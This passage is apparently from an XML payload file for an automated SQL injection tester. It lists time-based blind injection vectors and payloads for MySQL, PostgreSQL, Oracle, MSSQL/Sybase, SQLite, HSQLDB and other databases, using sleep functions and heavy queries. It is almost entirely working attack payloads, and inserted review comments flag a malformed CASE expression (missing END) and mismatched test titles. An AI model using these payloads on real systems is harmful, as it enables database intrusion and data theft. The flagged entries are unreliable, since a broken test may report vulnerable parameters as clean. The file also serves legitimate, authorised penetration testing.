(BENCHMARK)</title>1623<stype>5</stype>1624<level>4</level>1625<risk>2</risk>1626<clause>1,2,3,9</clause>1627<where>3</where>1628<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</vector>1629<request>1630<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</payload>1631</request>1632<response>1633<time>[DELAYED]</time>1634</response>1635<details>1636<dbms>MySQL</dbms>1637<dbms_version>< 5.0.12</dbms_version>1638</details>1639</test>16401641<!-- NOTE(review): in the BENCHMARK test above, the CASE expression in both vector and payload is closed with ")" but has no END, unlike the other CASE-based tests in this file; if that makes the statement invalid on the target DBMS the check can never fire and an affected parameter would be reported as clean, so confirm. The test below is titled "heavy query - comment" but its request has no comment child, unlike the other "- comment" tests; confirm whether the title or the request is what was intended. --><test>1642<title>MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)</title>1643<stype>5</stype>1644<level>5</level>1645<risk>2</risk>1646<clause>1,2,3,9</clause>1647<where>3</where>1648<vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>1649<request>1650<payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>1651</request>1652<response>1653<time>[DELAYED]</time>1654</response>1655<details>1656<dbms>MySQL</dbms>1657<dbms_version>> 5.0.12</dbms_version>1658</details>1659</test>16601661<test>1662<title>MySQL time-based blind - Parameter replace (bool)</title>1663<stype>5</stype>1664<level>4</level>1665<risk>1</risk>1666<clause>1,2,3,9</clause>1667<where>3</where>1668<vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>1669<request>1670<payload>([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME]))</payload>1671</request>1672<response>1673<time>[SLEEPTIME]</time>1674</response>1675<details>1676<dbms>MySQL</dbms>1677</details>1678</test>16791680<test>1681<title>MySQL time-based blind - Parameter replace 
(ELT)</title>1682<stype>5</stype>1683<level>5</level>1684<risk>1</risk>1685<clause>1,2,3,9</clause>1686<where>3</where>1687<vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>1688<request>1689<payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>1690</request>1691<response>1692<time>[SLEEPTIME]</time>1693</response>1694<details>1695<dbms>MySQL</dbms>1696</details>1697</test>16981699<test>1700<title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>1701<stype>5</stype>1702<level>5</level>1703<risk>1</risk>1704<clause>1,2,3,9</clause>1705<where>3</where>1706<vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>1707<request>1708<payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>1709</request>1710<response>1711<time>[SLEEPTIME]</time>1712</response>1713<details>1714<dbms>MySQL</dbms>1715</details>1716</test>17171718<test>1719<title>PostgreSQL > 8.1 time-based blind - Parameter replace</title>1720<stype>5</stype>1721<level>3</level>1722<risk>1</risk>1723<clause>1,2,3,9</clause>1724<where>3</where>1725<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>1726<request>1727<payload>(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>1728</request>1729<response>1730<time>[SLEEPTIME]</time>1731</response>1732<details>1733<dbms>PostgreSQL</dbms>1734<dbms_version>> 8.1</dbms_version>1735</details>1736</test>17371738<test>1739<title>PostgreSQL time-based blind - Parameter replace (heavy query)</title>1740<stype>5</stype>1741<level>4</level>1742<risk>2</risk>1743<clause>1,2,3,9</clause>1744<where>3</where>1745<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>1746<request>1747<payload>(SELECT COUNT(*) FROM 
GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>1748</request>1749<response>1750<time>[DELAYED]</time>1751</response>1752<details>1753<dbms>PostgreSQL</dbms>1754</details>1755</test>17561757<test>1758<title>Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)</title>1759<stype>5</stype>1760<level>4</level>1761<risk>2</risk>1762<clause>1,3,9</clause>1763<where>3</where>1764<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>1765<request>1766<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</payload>1767</request>1768<response>1769<time>[DELAYED]</time>1770</response>1771<details>1772<dbms>Microsoft SQL Server</dbms>1773<dbms>Sybase</dbms>1774</details>1775</test>17761777<!-- Without parentheses because it never works with them; useful to exploit SQL injection in Oracle E-Business Suite Financials -->1778<test>1779<title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>1780<stype>5</stype>1781<level>3</level>1782<risk>1</risk>1783<clause>1,3,9</clause>1784<where>3</where>1785<vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>1786<request>1787<payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>1788</request>1789<response>1790<time>[SLEEPTIME]</time>1791</response>1792<details>1793<dbms>Oracle</dbms>1794</details>1795</test>17961797<test>1798<title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>1799<stype>5</stype>1800<level>3</level>1801<risk>1</risk>1802<clause>1,3,9</clause>1803<where>3</where>1804<vector>(SELECT (CASE WHEN 
([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>1805<request>1806<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>1807</request>1808<response>1809<time>[SLEEPTIME]</time>1810</response>1811<details>1812<dbms>Oracle</dbms>1813</details>1814</test>18151816<test>1817<title>Oracle time-based blind - Parameter replace (heavy queries)</title>1818<stype>5</stype>1819<level>4</level>1820<risk>2</risk>1821<clause>1,3,9</clause>1822<where>3</where>1823<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>1824<request>1825<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>1826</request>1827<response>1828<time>[DELAYED]</time>1829</response>1830<details>1831<dbms>Oracle</dbms>1832</details>1833</test>18341835<test>1836<title>SQLite > 2.0 time-based blind - Parameter replace (heavy query)</title>1837<stype>5</stype>1838<level>4</level>1839<risk>2</risk>1840<clause>1,2,3,9</clause>1841<where>3</where>1842<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>1843<request>1844<payload>(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))</payload>1845</request>1846<response>1847<time>[DELAYED]</time>1848</response>1849<details>1850<dbms>SQLite</dbms>1851<dbms_version>> 2.0</dbms_version>1852</details>1853</test>18541855<test>1856<title>Firebird time-based blind - Parameter replace (heavy query)</title>1857<stype>5</stype>1858<level>5</level>1859<risk>2</risk>1860<clause>1,2,3,9</clause>1861<where>3</where>1862<vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS 
T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>1863<request>1864<payload>(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>1865</request>1866<response>1867<time>[DELAYED]</time>1868</response>1869<details>1870<dbms>Firebird</dbms>1871<dbms_version>>= 2.0</dbms_version>1872</details>1873</test>18741875<test>1876<title>SAP MaxDB time-based blind - Parameter replace (heavy query)</title>1877<stype>5</stype>1878<level>5</level>1879<risk>2</risk>1880<clause>1,3,9</clause>1881<where>3</where>1882<vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>1883<request>1884<payload>(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>1885</request>1886<response>1887<time>[DELAYED]</time>1888</response>1889<details>1890<dbms>SAP MaxDB</dbms>1891</details>1892</test>18931894<test>1895<title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>1896<stype>5</stype>1897<level>5</level>1898<risk>2</risk>1899<clause>1,2,3,9</clause>1900<where>3</where>1901<vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>1902<request>1903<payload>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>1904</request>1905<response>1906<time>[DELAYED]</time>1907</response>1908<details>1909<dbms>IBM DB2</dbms>1910</details>1911</test>19121913<!-- Untested -->1914<test>1915<title>HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)</title>1916<stype>5</stype>1917<level>4</level>1918<risk>2</risk>1919<clause>1,2,3,9</clause>1920<where>3</where>1921<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE 
'[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>1922<request>1923<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>1924</request>1925<response>1926<time>[SLEEPTIME]</time>1927</response>1928<details>1929<dbms>HSQLDB</dbms>1930<dbms_version>>= 1.7.2</dbms_version>1931</details>1932</test>19331934<test>1935<title>HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)</title>1936<stype>5</stype>1937<level>5</level>1938<risk>2</risk>1939<clause>1,2,3,9</clause>1940<where>3</where>1941<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>1942<request>1943<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>1944</request>1945<response>1946<time>[SLEEPTIME]</time>1947</response>1948<details>1949<dbms>HSQLDB</dbms>1950<dbms_version>> 2.0</dbms_version>1951</details>1952</test>19531954<test>1955<title>Informix time-based blind - Parameter replace (heavy query)</title>1956<stype>5</stype>1957<level>4</level>1958<risk>2</risk>1959<clause>1,2,3,9</clause>1960<where>3</where>1961<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>1962<request>1963<payload>(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>1964</request>1965<response>1966<time>[DELAYED]</time>1967</response>1968<details>1969<dbms>Informix</dbms>1970</details>1971</test>1972<!-- End of time-based boolean tests - Parameter replace -->19731974<!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->1975<test>1976<title>MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY 
clause</title>1977<stype>5</stype>1978<level>3</level>1979<risk>1</risk>1980<clause>2,3</clause>1981<where>1</where>1982<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</vector>1983<request>1984<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</payload>1985</request>1986<response>1987<time>[SLEEPTIME]</time>1988</response>1989<details>1990<dbms>MySQL</dbms>1991<dbms_version>>= 5.0.12</dbms_version>1992</details>1993</test>19941995<test>1996<title>MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)</title>1997<stype>5</stype>1998<level>4</level>1999<risk>2</risk>2000<clause>2,3</clause>2001<where>1</where>2002<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>2003<request>2004<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>2005</request>2006<response>2007<time>[DELAYED]</time>2008</response>2009<details>2010<dbms>MySQL</dbms>2011<dbms_version>< 5.0.12</dbms_version>2012</details>2013</test>20142015<test>2016<title>PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause</title>2017<stype>5</stype>2018<level>3</level>2019<risk>1</risk>2020<clause>2,3</clause>2021<where>1</where>2022<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>2023<request>2024<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>2025</request>2026<response>2027<time>[SLEEPTIME]</time>2028</response>2029<details>2030<dbms>PostgreSQL</dbms>2031<dbms_version>> 8.1</dbms_version>2032</details>2033</test>20342035<test>2036<title>PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy 
query)</title>2037<stype>5</stype>2038<level>4</level>2039<risk>2</risk>2040<clause>2,3</clause>2041<where>1</where>2042<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>2043<request>2044<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>2045</request>2046<response>2047<time>[DELAYED]</time>2048</response>2049<details>2050<dbms>PostgreSQL</dbms>2051</details>2052</test>20532054<test>2055<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>2056<stype>5</stype>2057<level>4</level>2058<risk>2</risk>2059<clause>2,3</clause>2060<where>1</where>2061<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>2062<request>2063<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>2064</request>2065<response>2066<time>[DELAYED]</time>2067</response>2068<details>2069<dbms>Microsoft SQL Server</dbms>2070<dbms>Sybase</dbms>2071</details>2072</test>20732074<test>2075<title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>2076<stype>5</stype>2077<level>3</level>2078<risk>1</risk>2079<clause>2,3</clause>2080<where>1</where>2081<vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>2082<request>2083<payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; 
END;)</payload>2084</request>2085<response>2086<time>[SLEEPTIME]</time>2087</response>2088<details>2089<dbms>Oracle</dbms>2090</details>2091</test>20922093<test>2094<title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>2095<stype>5</stype>2096<level>3</level>2097<risk>1</risk>2098<clause>2,3</clause>2099<where>1</where>2100<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>2101<request>2102<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>2103</request>2104<response>2105<time>[SLEEPTIME]</time>2106</response>2107<details>2108<dbms>Oracle</dbms>2109</details>2110</test>21112112<test>2113<title>Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>2114<stype>5</stype>2115<level>4</level>2116<risk>2</risk>2117<clause>2,3</clause>2118<where>1</where>2119<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>2120<request>2121<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>2122</request>2123<response>2124<time>[DELAYED]</time>2125</response>2126<details>2127<dbms>Oracle</dbms>2128</details>2129</test>21302131<test>2132<title>HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>2133<stype>5</stype>2134<level>4</level>2135<risk>2</risk>2136<clause>2,3</clause>2137<where>1</where>2138<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM 
INFORMATION_SCHEMA.SYSTEM_USERS)</vector>2139<request>2140<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>2141<comment>--</comment>2142</request>2143<response>2144<time>[DELAYED]</time>2145</response>2146<details>2147<dbms>HSQLDB</dbms>2148<dbms_version>>= 1.7.2</dbms_version>2149</details>2150</test>21512152<!-- NOTE(review): the HSQLDB >= 1.7.2 test above carries a comment element in its request, yet its title has no "- comment" suffix and the HSQLDB > 2.0 test below has no comment element; confirm which form is intended so the title describes what is actually sent. --><test>2153<title>HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>2154<stype>5</stype>2155<level>4</level>2156<risk>2</risk>2157<clause>2,3</clause>2158<where>1</where>2159<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>2160<request>2161<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>2162</request>2163<response>2164<time>[DELAYED]</time>2165</response>2166<details>2167<dbms>HSQLDB</dbms>2168<dbms_version>> 2.0</dbms_version>2169</details>2170</test>21712172<!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->2173</root>217421752176